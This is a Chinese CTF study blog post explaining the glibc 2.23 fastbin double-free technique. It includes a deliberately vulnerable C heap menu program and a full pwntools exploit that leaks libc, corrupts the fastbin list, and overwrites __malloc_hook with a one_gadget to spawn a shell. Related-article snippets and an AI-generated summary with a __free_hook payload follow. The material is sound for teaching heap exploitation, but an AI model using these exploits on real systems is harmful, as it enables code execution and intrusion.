【我的 PWN 学习手札】Fastbin Double Free

最新推荐文章于 2025-02-22 20:10:43 发布
原创 最新推荐文章于 2025-02-22 20:10:43 发布 · 810 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #ctf #heap #double free

前言

Fastbin的Double Free实际上还是利用其特性产生UAF的效果,使得可以进行Fastbin Attack 

一、Double Free

double free,顾名思义,free两次。对于fastbin这种单链表的组织结构,会形成这样一个效果:

如果我们malloc一块chunk,修改其fd指针,实际上实现了这样的效果:

这样就可以后利用到劫持__malloc_hook实现getshell

然而glibc有如下检查:

if (__builtin_expect(old == p, 0)) {
    errstr = "double free or corruption (fasttop)";
    goto errout;
}

意思是“刚去下来的chunk,和现在对应fastbin的第一个free chunk不能是同一个”,也即,两个chunk在fastbin中不能是自指的。

绕过也非常简单:在double free之中穿插释放其他的同样size的chunk即可

 

此时 malloc 获取 chunk1 等价于 UAF 漏洞。可以修改 chunk1 的 fd 指针指向特定地址,这样就
可以在特定位置申请 chunk 。利用Double Free,可以实现在没有edit函数的情况下(只能add时写),达成fastbin attack的效果

不过仍需要满足size的要求,具体看这一篇。 

二、测试与模板

这里用FastbinAttack的示例,稍作修改,用DoubleFree实现利用。

 

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>

char *chunk_list[0x100];

void menu() {
    puts("1. add chunk");
    puts("2. delete chunk");
    puts("3. edit chunk");
    puts("4. show chunk");
    puts("5. exit");
    puts("choice:");
}

int get_num() {
    char buf[0x10];
    read(0, buf, sizeof(buf));
    return atoi(buf);
}

void add_chunk() {
    puts("index:");
    int index = get_num();
    puts("size:");
    int size = get_num();
    chunk_list[index] = malloc(size);
}

void delete_chunk() {
    puts("index:");
    int index = get_num();
    free(chunk_list[index]);
}

void edit_chunk() {
    puts("index:");
    int index = get_num();
    puts("length:");
    int length = get_num();
    puts("content:");
    read(0, chunk_list[index], length);
}

void show_chunk() {
    puts("index:");
    int index = get_num();
    puts(chunk_list[index]);
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    while (1) {
        menu();
        switch (get_num()) {
            case 1:
                add_chunk();
                break;
            case 2:
                delete_chunk();
                break;
            case 3:
                edit_chunk();
                break;
            case 4:
                show_chunk();
                break;
            case 5:
                exit(0);
            default:
                puts("invalid choice.");
        }
    }
}

from pwn import *
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)

# leak libc
add(0,0x100)
add(1,0x10)
delete(0)
show(0)
libc_base=u64(io.recv(6).ljust(8,b'\x00'))+0x7c1ab1200000-0x7c1ab159bb78
success(hex(libc_base))

# Fastbin Double Free
target_addr=libc_base-0x7c1ab1200000+0x7c1ab159baed

add(0,0x68) # chunk0
add(1,0x68) # chunk1
delete(0)   # chunk0
delete(1)   # chunk1
delete(0)   # chunk0
pause()
add(2,0x68) # chunk0
edit(2,0x8,p64(target_addr))
pause()
add(3,0x68) # chunk1
add(4,0x68) # chunk0
add(5,0x68) # fake_chunk

# one_gadget
'''
0x3f3e6 execve("/bin/sh", rsp+0x30, environ)
constraints:
  address rsp+0x40 is writable
  rax == NULL || {rax, "-c", rbx, NULL} is a valid argv

0x3f43a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL || {[rsp+0x30], [rsp+0x38], [rsp+0x40], [rsp+0x48], ...} is a valid argv

0xd5c07 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv
'''
# edit(0,0x13+0x8,b'a'*0x13+p64(libc_base+0xd5c07))   
edit(5,0x13+0x8,b'a'*(0x13-0x8)+p64(libc_base+0x3f43a)+p64(libc_base+libc.sym['realloc']+9))
add(0,0x10)
io.interactive()
一道堆方向的pwndouble free & unsorted bins)
F_Day_的博客
10-17 1195
一道堆方向的pwndouble free & unsorted bins)做题环境什么是double free 在某博客上看到了一道堆的题,博主说是入门的,嗯,那正好适合我,于是我花了一周终于出结果了。。。。。。 来看看我都遇到了什么问题 做题环境 Ubuntu 20.04.3 LTS,这是我在微软商店下载的子系统,也是一切万恶之源的开始 题目:Roc826 什么是double free 希望再次之前,你已经知道什么是堆了。 double free就是对一个堆free两次 在堆中,free后堆
pwn-double free
xy_369的博客
05-21 1367
指针情况:(只连续free两次xy1不行,有检查机制,中间必须free一个同等大小的chunk才能绕过检查机制,检查机制)一个神奇的现象:xy1 中输入的数据同时也输进了 Top chunk。1、代码及编译指令(运行环境:ubuntu16.04)
【Linux堆利用】Fastbin Double Free
、moddemod
06-16 561
Double Free是针对fastbin的攻击,字面意思就是重复释放内存,也就是两次free()同一块内存导致的漏洞。 由于fastbin的机制,在满足fastbin的chunk在被释放后它下一个chunk的P位不会被置为0,也就是说即使当前chunk被释放掉了,但是他的next_chunk的P为还依然为1(1表示前一个chunk正在使用中),但他却是已经被free()掉了,这样做的目的是为了防止chunk被合并(因为现实证明,就是程序通常会申请小内存块比较频繁,如果每次申请释放都重复分割合并,会导致性能
初学堆 UAF漏洞及double free 利用手法(libc2.23)
weixin_66751120的博客
03-06 2240
UAF漏洞及double free 利用手法(libc2.23) 通过一道例题加深理解
Fastbin Double Free
钞sir的博客
01-19 5116
似水流年月下花前 一舞倾城醉红颜 岁暮天寒月缺花残 独留孤影忆从前 简介 fastbin attack 是一类漏洞的利用方法,是指所有基于 fastbin 机制的漏洞利用方法,而fastbin_double_free就是其中的一种,这类漏洞利用的前提是: 存在堆溢出、use-after-free等能控制chunk内容的漏洞 漏洞发生于fastbin类型的chunk中 Fastbin Double...
好好说话之Fastbin Attack(1):Fastbin Double Free
hollk’s blog
10-23 3887
好像拖更了好久。。。实在是抱歉。。。。主要是fastbin attack包含了四个部分,后面的例题不知道都对应着哪个方法,所以做完了例题才回来写博客。fastbin attack应该也会分四篇文章分开写。学了这么长时间pwn给我最大的感受就是量变确实可以引起质变,现在做题或者学习新的技术的时候可以隐约的进行以点看面的思考,通过某一处问题会在心里想象可能会引发什么什么样的后果。总的来说不后悔入坑pwn,字节之间的环环相扣让我深深的着迷!
printf打印二进制_二进制安全之堆溢出(系列)—— fastbin double free
weixin_39996134的博客
12-06 192
本文是二进制安全之堆溢出系列的第九章节,主要介绍 fastbin double free。原理介绍Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放,因此可以在 fastbin 链表中存在多次。 这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块,相当于多个指针指向同一个堆块。原因fastbin 的堆块被释放后 next_chunk 的...
[BUUCTF]-PWN:wustctf2020_easyfast解析(fastbin double free)
2301_79326813的博客
02-06 466
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用double free有两种解法。
从两道基础题简单认识和了解fastbin double free漏洞的利用
weixin_44864859的博客
07-13 1138
fastbin double free原理 Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放,因此可以在 fastbin 链表中存在多次。这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆 (type confused) 的效果。(即可以构造假的chunk实现任意地址写) Fastbin Double Free 能够成功利用主要有两部分的原因 fastbin 的堆块被释放后
【我的 PWN 学习手札】malloc_init_state attack
Mr_Fmnwon的博客
10-24 1089
malloc_consolidate 会根据 global_max_fast 是否为 0 来判断 ptmalloc 是否已经初始化,因此如果能 通过任意地址写将 global_max_fast 置 0 然后触发 malloc_consolidate 就可以调用 malloc_init_state。
[pwn]堆:熟练掌握double free+unlink
Breeze的博客
09-06 9164
double free+unlink 4-ReeHY-main-100 writeup 一道经典的堆溢出题目4-ReeHY-main-100 题目分析 江湖规矩,先看安全策略: 还可以,没有full relro说明可以修改got表。然后看看程序的逻辑: 一看到菜单基本就是堆得题目没跑了,然后IDA查看反汇编代码: create函数(我改名后): 整个create函数充斥着符号溢出的味道… 然...
fastbins_Double Free调试
qq_30528603的博客
11-12 176
在我们程序第一次分配内存的时候,bins中是没有任何可以用的内存。此时我们在fastbins中会有三个chunk,因为libc没有再这里设置过硬的检查,并且这块空间在free的时候没有置为NULL,因此这片空间能够被当成正常的chunk在fastbins中链接。到目前为止,程序执行流程大致是glibc在malloc真正执行前,会先去检查是否有用户自定义的hook函数,如果有,就先行调用,如果没有就按正常的malloc执行。我们首先得知道,在fastbins中,被释放的chunk都是单链表链接起来的。
ctf-pwn tc和smallbin的doublefree利用
蚁景网安学院
07-15 491
前言:之前曾经有了解过libc.2.31下tc和smallbin的联合利用, 但是那次看到的是malloc与calloc的使用, 所以这次借助TCTF2021的listbook来讲讲2.3...
Pwn actf_2019_message:fastbin double free 做法
qq_33348179的博客
02-22 404
那么接下来就是泄露got地址 得到libc基址 得到freehook地址 再让freehook指向system(先将chunk6改为freehook地址 再利用chunk0 改为system)如果需要绕过fastbin对两次free的检查 就需要提前再设置一个0x30大小的堆 来让接下来的创建堆能顺利创建到假chunk的位置。如果double free之后 再申请一个大小相同的堆 ptr所在的位置往前移8字节(0x602058) 假设以此处为假chunk头。再通过给出的函数就能修改假chunk的内容。
linux_pwn(2)--double free&&qwb2018_raisepig
azraelxuemo的博客
03-05 1535
文章目录What is double freepwn题例题add函数show函数delete函数开始做题准备框架调试泄露libcdouble freeexp总结 What is double free double free顾名思义,两次释放,在ctf里面一般就是对同一个内存块释放了两次,其实这个跟之前的uaf产生的方式有点类似,都是需要满足指针没有被置NULL ptr=malloc(0x10) ptr2=malloc(0x10) free(ptr) free(ptr2) free(ptr) 由于直接连续
pwn刷题num46----fast bin double free (控制free chunk的fd指针指向,栈上伪造的fake chunk,修改栈上变量值)
tbsqigongzi的博客
05-03 1149
BUUCTF-PWN-metasequoia_2020_samsara 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 保护全开 动态链接 英文意思 打败魔龙后,你变成了魔龙…… 1. 抓捕一个人 2. 吃掉一个人 3. 煮一个人 4. 找到你的巢穴 5. 转移到另一个王国 6. 自杀 ida看一下伪代码 主函数 还有一个菜单函数 观察分析main函数,switch里case1每次申请chunk大小为0x20(mem为0x10), case
[蓝桥杯2024]-PWN:ezheap解析(堆glibc2.31,glibc2.31下的double free
2301_79326813的博客
05-03 1102
查看保护查看ida大致就是只能创建0x60大小的堆块,并且uaf只能利用一次。
i春秋2020新春战役PWN之document(绕过tcache的double free检测)
seaaseesa的博客
02-27 3317
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
【二进制安全】堆漏洞:Double Free原理
dzqxwzoe的博客
01-25 1120
我们先不用管 修改已被释放的空闲块中的内容到底有什么用,我们现在只需要知道。
PWN double free
最新发布
03-21
<think>好的,我现在需要回答用户关于PWNdouble free漏洞的利用方法和防御措施的问题。首先,我需要回忆一下double free的基本概念。Double free指的是在程序中多次释放同一块内存,这可能导致内存管理数据结构的破坏,进而被攻击者利用。 根据引用[1]中提到,常规题目中主函数可能存在触发shell的条件,但free函数对UAF(Use After Free)和double free(df)有防御措施,无法直接突破。然而,edit函数存在漏洞,允许控制写入字节,导致overlapping攻击。这说明即使有防御,如果其他函数存在漏洞,仍可能被利用。 接下来,引用[2]指出,double free原语几乎无懈可击,但UAF或溢出类漏洞需要精确修改结构体中的特定位置值。如果攻击者能控制写入的位置和内容,就能绕过防御,比如修改chunk的指针,构造任意地址读写。 然后,引用[3]关于堆风水的部分提到,堆排布是堆漏洞利用的关键,需要熟悉glibc的内存管理策略。破坏堆内存管理的数据结构如bin或chunk,可以导致任意内存读写或控制流劫持。防御方法包括Heap Canary、CFI、ASLR等。 现在,结合这些信息,我需要整理利用double free的步骤。首先,触发double free,连续释放同一chunk两次,这会使得bin链表出现循环。接着,通过堆排布,重新分配这些chunk,并利用edit函数修改fd或bk指针,指向伪造的chunk。然后,分配伪造的chunk,实现任意地址写,比如修改GOT表或函数指针,最后劫持控制流执行shellcode或ROP链。 防御措施方面,引用[2]和[3]提到,glibc的改进如tcache double free检测,在释放时会检查chunk是否已在链表中。此外,Heap Canary可以检测堆溢出,ASLR和DEP增加利用难度。代码审计和安全机制如CFI也能有效防御。 需要确保回答结构清晰,分点说明利用方法和防御措施,并引用提供的资料。同时,按照用户要求,生成相关问题,例如利用步骤、防御技术、绕过方法等。</think>### PWNdouble free漏洞的利用与防御分析 #### 1. Double Free漏洞原理 double free指对同一块堆内存进行多次释放,破坏glibc内存管理结构(如tcache或fastbin的链表),导致内存布局可控。例如,连续释放chunk A两次后,其fd指针可能形成循环链表,后续分配时可构造重叠的chunk,最终实现任意地址读写或控制流劫持[^2][^3]。 #### 2. 利用方法及步骤 **典型利用流程**: 1. **触发double free**:通过程序逻辑连续释放同一chunk两次,例如: ```c free(ptr); free(ptr); // 触发double free ``` 2. **堆排布(Heap Feng Shui)**:通过分配特定大小的chunk,控制内存布局,使后续分配的chunk覆盖关键数据。 3. **修改链表指针**:利用存在漏洞的`edit`函数修改chunk的`fd`或`bk`指针,指向伪造的chunk(如GOT表、`__free_hook`等)[^1]。 4. **分配伪造chunk**:通过`malloc`获取指向目标地址的指针,实现任意地址写入,例如修改`__free_hook`为`system`地址。 5. **触发执行流劫持**:调用`free`或相关函数时,跳转至攻击者控制的代码(如ROP链或shellcode)[^4]。 **示例场景**: 若程序允许写入释放后的chunk,攻击者可构造如下payload: ```python # 假设chunk大小为0x20 add(0x20, "A") # chunk A free(0) free(0) # double free edit(0, p64(libc_base + 0x1eeb28)) # 修改fd指针指向__free_hook add(0x20, "B") # 分配chunk A add(0x20, "/bin/sh") # 分配chunk A的fd指向位置(即__free_hook) add(0x20, p64(system_addr)) # 将__free_hook覆盖为system free("/bin/sh") # 触发system("/bin/sh") ``` #### 3. 防御措施 1. **glibc防护机制**: - **tcache double free检测**:glibc 2.29+在释放时会检查chunk是否已在tcache链表中。 - **fastbin完整性校验**:分配时验证`fd`指针是否指向合法内存区域。 2. **堆内存保护技术**: - **Heap Canary**:检测堆溢出对管理结构的破坏。 - **Safe-Linking**(glibc 2.32+):对链表指针进行异或加密,增加伪造难度。 3. **系统级防护**: - **ASLR**:随机化地址空间,增加定位目标的难度。 - **DEP**:阻止攻击者执行堆栈中的shellcode[^3]。 4. **代码审计**: - 严格检查`free`前后指针置空情况,避免悬垂指针。 - 限制用户对chunk内容的写入范围和权限。 #### 4. 绕过防御的常见方法 - **利用其他漏洞组合**:若存在堆溢出或UAF,可覆盖`key`字段(tcache的double free检测标志)。 - **构造特定内存布局**:通过大量分配/释放操作,使伪造的chunk通过glibc的完整性检查。 - **劫持控制流的替代目标**:若`__free_hook`被保护,可转向修改`_IO_FILE`结构体或ROP链[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值